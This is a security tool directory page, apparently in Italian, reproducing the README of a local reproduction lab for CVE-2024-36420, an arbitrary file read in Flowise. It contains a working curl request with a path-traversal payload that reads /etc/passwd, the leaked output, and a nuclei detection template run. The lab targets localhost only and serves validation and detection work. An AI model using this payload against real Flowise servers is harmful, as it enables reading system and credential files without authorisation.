Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC_CVE-2024-36420 — POC_CVE-2024-36420 | Kitploit
Strumenti/GitHubGitHub/fineman999/poc_cve-2024-36420
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebFuzzingApprendimento e FormazioneLab e Pratica
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

POC_CVE-2024-36420

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

POC_CVE-2024-36420

Laboratorio di riproduzione locale e bozza di template nuclei per CVE-2024-36420 che colpisce Flowise.

Sommario

CVE-2024-36420 è una lettura arbitraria di file in Flowise causata dall'uso non sanificato del parametro body fileName in:

  • POST /api/v1/openai-assistants-file

Questo laboratorio è stato utilizzato per validare:

  • il comportamento vulnerabile su flowiseai/flowise:1.4.3
  • il comportamento negato sulla versione più recente flowiseai/flowise:3.1.2

Riferimenti

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

File

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

Test vulnerabile

Avvia Flowise 1.4.3:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

Verifica manuale:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Risposta vulnerabile osservata:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

Controllo sulla versione più recente

Avvia la versione più recente di Flowise 3.1.2:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

Verifica manuale:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Risposta osservata nella versione più recente:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

Valida il template:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

Esegui contro il target vulnerabile:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

Comportamento atteso:

  • 1.4.3: match
  • 3.1.2: nessun match

Note

  • Il divario di versione è accettabile perché questo repository afferma solo il comportamento osservato:
    • vulnerabile su 1.4.3
    • negato su 3.1.2
  • Non dichiara il limite esatto della versione corretta.
  • Non sono stati utilizzati target reali.
Scarica lo strumento